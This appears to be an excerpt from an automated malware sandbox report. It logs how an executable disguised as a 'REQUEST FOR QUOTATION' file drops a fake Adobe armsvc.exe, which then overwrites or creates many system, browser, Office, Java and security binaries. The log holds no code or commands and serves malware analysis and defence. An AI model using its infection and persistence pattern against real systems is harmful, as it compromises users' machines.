              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\VSSVC.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\wbengine.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\SearchIndexer.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\TieringEngineService.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\AgentService.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\FXSSVC.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\OpenSSH\ssh-agent.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\SensorDataService.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\msdtc.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Mozilla Firefox\pingsender.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXEJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\vds.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\snmptrap.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\Spectrum.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Windows Media Player\wmpnetwk.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\Locator.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\7-Zip\7z.exeJump to dropped file
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeFile created: C:\Windows\System32\AppVClient.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\SysWOW64\perfhost.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\7-Zip\7zG.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\msiexec.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Mozilla Firefox\firefox.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\TieringEngineService.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Mozilla Firefox\updater.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\FXSSVC.exeJump to dropped file
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\SensorDataService.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\msdtc.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\wbem\WmiApSrv.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to dropped file
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeFile created: C:\Windows\System32\alg.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\7-Zip\7zFM.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\VSSVC.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\wbengine.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\SearchIndexer.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeJump to dropped file
